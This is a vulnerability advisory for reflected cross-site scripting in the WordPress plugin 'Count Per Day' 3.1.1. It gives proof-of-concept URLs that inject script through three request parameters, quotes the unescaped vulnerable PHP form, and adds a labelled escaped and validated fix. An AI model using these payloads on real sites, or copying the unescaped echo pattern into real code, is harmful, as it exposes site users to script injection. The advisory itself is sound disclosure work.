SSCHADV2012-015 - WordPress Plugin 'Count Per Day' 3.1.1 Multiple Cross-site scripting vulnerabilities
Advisory: WordPress Plugin ‘Count Per Day’ 3.1.1 Multiple Cross-site scripting vulnerabilities
Advisory ID: SSCHADV2012-015
Author: Stefan Schurtz
Affected Software: Successfully tested on ‘Count Per Day’ 3.1.1
Vendor URL:
Vendor Status: fixed
CVE-ID: CVE-2012-3434
======================
Vulnerability Description
======================
The WordPress plugin ‘Count Per Day’ 3.1.1 is prone to multiple reflected XSS vulnerabilities: the datemin, datemax and page request parameters are echoed into HTML attribute values without escaping.
==============
PoC-Exploit
==============
http://[target]/wp/wp-content/plugins/count-per-day/userperspan.php?page="/><script>alert(/xss/)</script>
http://[target]/wp/wp-content/plugins/count-per-day/userperspan.php?datemin="/><script>alert(/xss/)</script>
http://[target]/wp/wp-content/plugins/count-per-day/userperspan.php?datemax="/><script>alert(/xss/)</script>
==============
Vulnerable code
==============
// userperspan.php
// $cpd_datemin, $cpd_datemax and $cpd_page come straight from the request and are
// written into value="..." attributes without escaping.
<form action="" method="post">
<p style="background:#ddd; padding:3px;">
<?php _e('Start', 'cpd'); ?>: <input type="text" name="datemin" value="<?php echo $cpd_datemin; ?>" size="10" />
<?php _e('End', 'cpd'); ?>: <input type="text" name="datemax" value="<?php echo $cpd_datemax; ?>" size="10" />
<?php _e('PostID', 'cpd'); ?>: <input type="text" name="page" value="<?php echo $cpd_page; ?>" size="5" />
<input type="submit" value="<?php _e('show', 'cpd'); ?>" />
</p>
</form>
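The same form with the defect removed, added here as an illustration and not taken from the plugin or from the fixed release: each request value is validated against an allow-list and escaped with esc_attr() before it is echoed into an attribute. It assumes the three values are read from $_REQUEST, since the advisory does not show where the plugin assigns $cpd_datemin, $cpd_datemax and $cpd_page.

```php
<?php
// Added example, not the plugin's code: the userperspan.php form with the
// three request values validated against an allow-list and escaped with
// esc_attr() before they are echoed inside value="..." attributes.
// Assumption: the values are read from $_REQUEST (the PoC sends them as GET
// parameters even though the form posts them); the plugin's own source of
// $cpd_datemin, $cpd_datemax and $cpd_page is not shown in the advisory.

// Attribute-context escaping; the fallback only matters outside WordPress
// (e.g. when unit-testing this helper from the CLI).
function cpd_attr($value) {
    if (function_exists('esc_attr')) {
        return esc_attr($value);
    }
    // ENT_QUOTES turns the double quote the PoC relies on ("/><script>...)
    // into &quot;, so the value can no longer close the attribute.
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Allow-list validation: dates must be YYYY-MM-DD, PostID must be an integer.
// Anything else is replaced by a safe default rather than echoed back.
function cpd_date($value) {
    return preg_match('/^\d{4}-\d{2}-\d{2}$/', (string) $value) ? (string) $value : '';
}
function cpd_post_id($value) {
    return ctype_digit((string) $value) ? (int) $value : 0;
}

$cpd_datemin = cpd_date(isset($_REQUEST['datemin']) ? $_REQUEST['datemin'] : '');
$cpd_datemax = cpd_date(isset($_REQUEST['datemax']) ? $_REQUEST['datemax'] : '');
$cpd_page    = cpd_post_id(isset($_REQUEST['page']) ? $_REQUEST['page'] : '');
?>
<form action="" method="post">
<p style="background:#ddd; padding:3px;">
<?php _e('Start', 'cpd'); ?>: <input type="text" name="datemin" value="<?php echo cpd_attr($cpd_datemin); ?>" size="10" />
<?php _e('End', 'cpd'); ?>: <input type="text" name="datemax" value="<?php echo cpd_attr($cpd_datemax); ?>" size="10" />
<?php _e('PostID', 'cpd'); ?>: <input type="text" name="page" value="<?php echo cpd_attr($cpd_page); ?>" size="5" />
<input type="submit" value="<?php _e('show', 'cpd'); ?>" />
</p>
</form>
```

With both layers in place the advisory's payloads are rejected by validation, and even a value that passed validation could not break out of the attribute because the double quote is encoded.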
==============
Solution
==============
Upgrade to the latest version 3.2
================
Disclosure Timeline
================
29-Jun-2012 – developer informed (contact form)
02-Jul-2012 – verified by Meistar
03-Jul-2012 – feedback from developer
14-Jul-2012 – fixed by developer
==============
Credits
==============
Vulnerabilities found and advisory written by Stefan Schurtz.
==============
References
==============